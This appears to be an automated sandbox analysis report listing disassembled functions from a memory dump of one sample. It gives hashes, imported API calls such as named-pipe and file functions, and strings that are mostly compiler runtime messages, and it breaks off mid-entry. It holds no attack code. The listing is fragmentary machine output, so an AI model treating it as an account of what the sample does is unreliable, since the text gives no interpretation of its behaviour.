Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fee81b4d80be5685d5198290934ea415fe98b51e4b7cf41c28b3c9105e8cbe7
Instruction ID: 2d834b34856efd56d1d540b4cd7f0f176508d9315af7b9d3de673e2850ce1b8c
Opcode Fuzzy Hash: 8fee81b4d80be5685d5198290934ea415fe98b51e4b7cf41c28b3c9105e8cbe7
Instruction Fuzzy Hash: 42510AB6214A508BD714CB0DE49072AB7E1F3CDBD4F84421AE78B8B768DA3CDA45CB40

Uniqueness

Uniqueness Score: -1.00%

Function 004768E9 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: CaptureContextUnwindabort
String ID:
API String ID: 747564614-0
Opcode ID: 8933fedeb3ce6f6f518034e175197ccfe3a32335034b023416f430c85a8ea68f
Instruction ID: 5532018e57275c016647bda3b63aebf7e761a31d4a22e6f3a33f34cdae744611
Opcode Fuzzy Hash: 8933fedeb3ce6f6f518034e175197ccfe3a32335034b023416f430c85a8ea68f
Instruction Fuzzy Hash: A641C4BBB01F0082CB19CF2BE99522E7365F789F98B0495268F8E43728DF38D4918350

Uniqueness

Uniqueness Score: -1.00%

Function 00462DBB Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f30c22a175b191d5b0191f7b7799bb4d67958831dd2714929188f7bc37e11d5
Instruction ID: 6b05b559ddaa56738b2b10a400a9c48f2359be9805ff9dc7e5c2330c87198fda
Opcode Fuzzy Hash: 5f30c22a175b191d5b0191f7b7799bb4d67958831dd2714929188f7bc37e11d5
Instruction Fuzzy Hash: BE31EE23701A8481DB149F6AE64535D6360EB55FECF088237CF0D173A9DA7DC882C349

Uniqueness

Uniqueness Score: -1.00%

Function 00462B17 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 228cabe17d1ea81827c6d8694cd2c6b411d5af3d7ccbafb4c9feb602021ad425
Instruction ID: 8da53db52401f3b2cec71493a258dd203dce0f23a1f8ffe2c4cde8f14f0e54bd
Opcode Fuzzy Hash: 228cabe17d1ea81827c6d8694cd2c6b411d5af3d7ccbafb4c9feb602021ad425
Instruction Fuzzy Hash: B031CF23782A8495DF11DF2AE94536D2761E786FA8F188126DF0C0B3A5DB7DD483C348

Uniqueness

Uniqueness Score: -1.00%

Function 0046165B Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f76fde455de2181e7126a486f9c5cc0293926f1e18c6af347c650b31b826f5c
Instruction ID: 41e579e65cf7bb42beac612981d5ace22f75a8ee0200ce729a9159dbb48a8e04
Opcode Fuzzy Hash: 1f76fde455de2181e7126a486f9c5cc0293926f1e18c6af347c650b31b826f5c
Instruction Fuzzy Hash: B0310176A40A4482CB249F3AD04536D27A0E756F9CF1C8226DF59473B4DF3DC886C74A

Uniqueness

Uniqueness Score: -1.00%

Function 004A0DD0 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e9fceae508a9063aa357e02aee3fdf08191cce5396ee6044a3804b102a03238
Instruction ID: 6eb423efdadf448e91040a5eba44b0f8c82c7e19170bfe068cc8a5bf2c8176fa
Opcode Fuzzy Hash: 9e9fceae508a9063aa357e02aee3fdf08191cce5396ee6044a3804b102a03238
Instruction Fuzzy Hash: E80192B7F1164085DF199BB6D04566E7365ABAAB8CF449816DF0807308DB7DC8D18308

Uniqueness

Uniqueness Score: -1.00%

Function 00462E02 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: CaptureContextUnwindabort
String ID:
API String ID: 747564614-0
Opcode ID: 6ab2729ec5f54538411e522b3e4207a46e606a601e379ecc4295554dd413c341
Instruction ID: 93b66915afd5889775e044e6476b3cc138a92bcd6617bd4d09f467555b34629b
Opcode Fuzzy Hash: 6ab2729ec5f54538411e522b3e4207a46e606a601e379ecc4295554dd413c341
Instruction Fuzzy Hash: E701A166701B9440DF149F6BD54436D9760AB5AFC8F08903BAE0D27766DE3EC8828348

Uniqueness

Uniqueness Score: -1.00%

Function 0049EE54 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de12498f5946ca98d927a6caa7a1eced11d5eb482109d5a105d9c14d550c7b68
Instruction ID: fa0f4f7970f5dc511233c3f0ea4ffba47d06303aa9eade950a4eb727673afa7a
Opcode Fuzzy Hash: de12498f5946ca98d927a6caa7a1eced11d5eb482109d5a105d9c14d550c7b68
Instruction Fuzzy Hash: 82F0AD2270069485DB10AF2BE80075EA760AB85FDCF589436AF4C47724DE39C4478314

Uniqueness

Uniqueness Score: -1.00%

Function 004616A2 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: CaptureContextUnwindabort
String ID:
API String ID: 747564614-0
Opcode ID: 74725de97574e5a6e82c5c3c9c147a84425f67c9c23c33a410912a6134c7a1a2
Instruction ID: 996cc5e5c26116a0dd44702f357b2e2f1769156f21ed38079435ff1f17c5f109
Opcode Fuzzy Hash: 74725de97574e5a6e82c5c3c9c147a84425f67c9c23c33a410912a6134c7a1a2
Instruction Fuzzy Hash: 5CF0A466A01B4040CF24AF67D0453AD6760D75AFCCF18942AEF4D5B3A6DE7DC486C748

Uniqueness

Uniqueness Score: -1.00%

Function 0044B82E Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: CaptureContextUnwindabort
String ID:
API String ID: 747564614-0
Opcode ID: fec766c17bf4128042e80d4760ccec4d07d2bb616dca3d76915c3d89b974a71c
Instruction ID: 93548bb70786ee45026729adc0cda97ff875d83b3067a03f2f5ed3596aae2c00
Opcode Fuzzy Hash: fec766c17bf4128042e80d4760ccec4d07d2bb616dca3d76915c3d89b974a71c
Instruction Fuzzy Hash: 5401D236608B8981CA209F5AF8416AAB374F7CAB94F141126EF8D53B29CF39C195CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00498831 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab83e258a82f5dd396ad45d43df727de0846c27de7f062fab025706e9d1eacb3
Instruction ID: be4dfda55c292851e7b33ed489fdd24434920c3a6f4ceacf1d585f9055db4eb8
Opcode Fuzzy Hash: ab83e258a82f5dd396ad45d43df727de0846c27de7f062fab025706e9d1eacb3
Instruction Fuzzy Hash: 46C012D7E7110246C6086A3948932656B70E377748EA16E59D92561120660DC1274E4C

Uniqueness

Uniqueness Score: -1.00%

Function 0041EFA9 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: CaptureContextUnwindabort
String ID:
API String ID: 747564614-0
Opcode ID: bba19a8b117eaa1e656b345ffb077ebaface135106fcdaaec1eca4904483cdb6
Instruction ID: 6a7817a47c43f3812729b35e7ada7c4fcc23bb8ba1a74de5b219bd284439ca9c
Opcode Fuzzy Hash: bba19a8b117eaa1e656b345ffb077ebaface135106fcdaaec1eca4904483cdb6
Instruction Fuzzy Hash: EBF06CBA605B0081CA04DF96E49013877B4F7C9F90B15966ADE8D93710CF34C4A0C308

Uniqueness

Uniqueness Score: -1.00%

Function 004D1580 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41e477bd1adb3891256284b8eaa45bde40a35f41b93653dc5b2fc21a779cee2d
Instruction ID: 5e4fb945f1edf241a485e195bb2e95cb5d711dbc921d8d5f3b4b8688d674d145
Opcode Fuzzy Hash: 41e477bd1adb3891256284b8eaa45bde40a35f41b93653dc5b2fc21a779cee2d
Instruction Fuzzy Hash: B1C04C8BD49AD265E1124194593929A1A815A9397870DC66F4E65073E2951D4C026305

Uniqueness

Uniqueness Score: -1.00%

Function 00418819 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7d30dc85179c10ea08fb12b48e31d2130ab124e9db772c641fc8b9e426c6229
Instruction ID: e450a66f6d9b3c14f2902767f53b7281b109a17645572fbdd65802f23adf5ca8
Opcode Fuzzy Hash: c7d30dc85179c10ea08fb12b48e31d2130ab124e9db772c641fc8b9e426c6229
Instruction Fuzzy Hash: 27A0025644AC04E4D3100B40F8113A0522CF756640F446522C55591171A96C80008208

Uniqueness

Uniqueness Score: -1.00%

Function 0041B060 Relevance: 59.7, APIs: 14, Strings: 20, Instructions: 151fileCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0041B1BE
__iob_func.MSVCRT ref: 0041B23C
fwrite.MSVCRT ref: 0041B254
__iob_func.MSVCRT ref: 0041B260
fputs.MSVCRT ref: 0041B269
fwrite.MSVCRT ref: 0041B286
fputs.MSVCRT ref: 0041B2A0
__iob_func.MSVCRT ref: 0041B2A7
fwrite.MSVCRT ref: 0041B2C3
abort.MSVCRT ref: 0041B2C8
free.MSVCRT ref: 0041B2D0
abort.MSVCRT ref: 0041B335
__iob_func.MSVCRT ref: 0041B33A
fwrite.MSVCRT ref: 0041B356

Strings

bmit ful, xrefs: 0041B0C1
gh space, xrefs: 0041B08F
nsion (P, xrefs: 0041B0AD
lease su, xrefs: 0041B0B7
rg/bugs., xrefs: 0041B173
rg/bugs., xrefs: 0041B105
for for, xrefs: 0041B099
terminate called without an active exception, xrefs: 0041B34F
terminate called recursively, xrefs: 0041B2BC
http://g, xrefs: 0041B0FB
cc.gnu.o, xrefs: 0041B07B
html): , xrefs: 0041B0D5
mat expa, xrefs: 0041B0A3
l bug re, xrefs: 0041B0CB
cc.gnu.o, xrefs: 0041B181
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 0041B06A
, xrefs: 0041B14E
port at , xrefs: 0041B0E6
not enou, xrefs: 0041B085
terminate called after throwing an instance of ', xrefs: 0041B24D

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: __iob_funcfwrite$abortfputs$freememcpy
String ID: $ for for$%s: __pos (which is %zu) > this->size() (which is %zu)$bmit ful$cc.gnu.o$cc.gnu.o$gh space$html): $http://g$l bug re$lease su$mat expa$not enou$nsion (P$port at $rg/bugs.$rg/bugs.$terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
API String ID: 2467532838-809534619
Opcode ID: 14ccaa8f9c288cdcc890b538a1f279abbfb89c6546e9e7e4aa52794d62de03cd
Instruction ID: fe41f561c3560bc07ab7f7db2a1f3f24d5cc82397a8d36bd9da9efad61b8e1b9
Opcode Fuzzy Hash: 14ccaa8f9c288cdcc890b538a1f279abbfb89c6546e9e7e4aa52794d62de03cd
Instruction Fuzzy Hash: D9518E72710B4895EB20EFB2E8407CD7BA4F715B88F58411AEE6847B99CF39C156C34A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D900 Relevance: 30.2, APIs: 20, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0040D91C
memset.MSVCRT ref: 0040D93E
malloc.MSVCRT ref: 0040D955
memcpy.MSVCRT ref: 0040D97D
abort.MSVCRT ref: 0040D98E
CreateSemaphoreW.KERNEL32 ref: 0040D9BB
TlsAlloc.KERNEL32 ref: 0040D9C8
GetLastError.KERNEL32 ref: 0040D9F0
abort.MSVCRT ref: 0040D9F8

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: abortmalloc$AllocCreateErrorLastSemaphorememcpymemset
String ID:
API String ID: 342303811-0
Opcode ID: 2f055a0653f755b8b7ee57f11017992d9fcfa6225d4ee1ee09bbbb4c76de2bbe
Instruction ID: 916c36a0865aadf01c5e77de6a61953d18b98bfefa7bdbedac6088f662044022
Opcode Fuzzy Hash: 2f055a0653f755b8b7ee57f11017992d9fcfa6225d4ee1ee09bbbb4c76de2bbe
Instruction Fuzzy Hash: 6881B4B2B0270091EB159FA6E85476A7361F785B94F58813BCE1D237A4DF3CD84AC308

Uniqueness

Uniqueness Score: -1.00%

Function 004962F0 Relevance: 30.0, APIs: 6, Strings: 11, Instructions: 299COMMON

Download Yara Rule

APIs

__iob_func.MSVCRT ref: 00496351
__iob_func.MSVCRT ref: 004963C2
__iob_func.MSVCRT ref: 00496419

Strings

?J, xrefs: 0049641C, 0049657E, 004965F2
`RJ, xrefs: 0049689C
p"K, xrefs: 00496484
"K, xrefs: 004964FB
KJ, xrefs: 00496307
MJ, xrefs: 0049656E
@@J, xrefs: 00496740, 004968AC, 0049693B
@QJ, xrefs: 00496815
PK, xrefs: 004966C5
?J, xrefs: 004966E5, 00496863
PJ, xrefs: 00496474

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: __iob_func
String ID: "K$ ?J$ PJ$@@J$@QJ$PK$`RJ$p"K$?J$KJ$MJ
API String ID: 686374508-3530284415
Opcode ID: 0404ebc369bb0c2f973e9f5cf1c1e337dc6da8a1c4c4d8816c9d408982defa2d
Instruction ID: 2ce6eff6e6c44c0d41f0f31fff7489c785d9aba5062029563fccbba8472fa9db
Opcode Fuzzy Hash: 0404ebc369bb0c2f973e9f5cf1c1e337dc6da8a1c4c4d8816c9d408982defa2d
Instruction Fuzzy Hash: 9F021572200B8196E764CF21F49838E77A8F715748F018529DBE90B795EFBED0A9C385

Uniqueness

Uniqueness Score: -1.00%

Function 00495E10 Relevance: 30.0, APIs: 6, Strings: 11, Instructions: 226COMMON

Download Yara Rule

APIs

__iob_func.MSVCRT ref: 00496042
__iob_func.MSVCRT ref: 00496060
__iob_func.MSVCRT ref: 0049607D
__iob_func.MSVCRT ref: 004960F7

Strings

?J, xrefs: 00495FE4
`RJ, xrefs: 0049617E
AJ, xrefs: 00496083, 004960D0, 004960E7
MJ, xrefs: 004960C9
ios_base::_M_grow_words is not valid, xrefs: 00495F6A
@@J, xrefs: 00496028
@QJ, xrefs: 00496167
?J, xrefs: 00496015
ios_base::_M_grow_words allocation failed, xrefs: 00495F5E
`EJ, xrefs: 004960FD, 00496157
PJ, xrefs: 0049609B

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: __iob_func
String ID: ?J$ PJ$@@J$@QJ$`EJ$`RJ$ios_base::_M_grow_words allocation failed$ios_base::_M_grow_words is not valid$?J$AJ$MJ
API String ID: 686374508-3818885904
Opcode ID: 24be600b86dc0f1d100fe14e044e6c5e7e2a0b8906a57754d3966a4a1c96b674
Instruction ID: d7ea38783866ed82ace34d9f64b47d14102df1be51c1ca51654d4cf1a80159af
Opcode Fuzzy Hash: 24be600b86dc0f1d100fe14e044e6c5e7e2a0b8906a57754d3966a4a1c96b674
Instruction Fuzzy Hash: B2918BF2341A0485EF50EF2AE89136A2B25FB86BD8F544927DE0947369DF3CC052C35A

Uniqueness

Uniqueness Score: -1.00%

Function 03A73B34 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 105pipesleepfileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03A73D34
GetTickCount.KERNEL32 ref: 03A73D40
CreateFileA.KERNEL32 ref: 03A73D6E
GetLastError.KERNEL32 ref: 03A73D7D
WaitNamedPipeA.KERNEL32 ref: 03A73D92
Sleep.KERNEL32 ref: 03A73D9F
GetTickCount.KERNEL32 ref: 03A73DA5
GetLastError.KERNEL32 ref: 03A73DBB
GetLastError.KERNEL32 ref: 03A73DD3
SetNamedPipeHandleState.KERNEL32 ref: 03A73DFE
GetLastError.KERNEL32 ref: 03A73E08
DisconnectNamedPipe.KERNEL32 ref: 03A73E82

Strings

C:\Windows\system32\wininet.dll, xrefs: 03A73D5E

Memory Dump Source

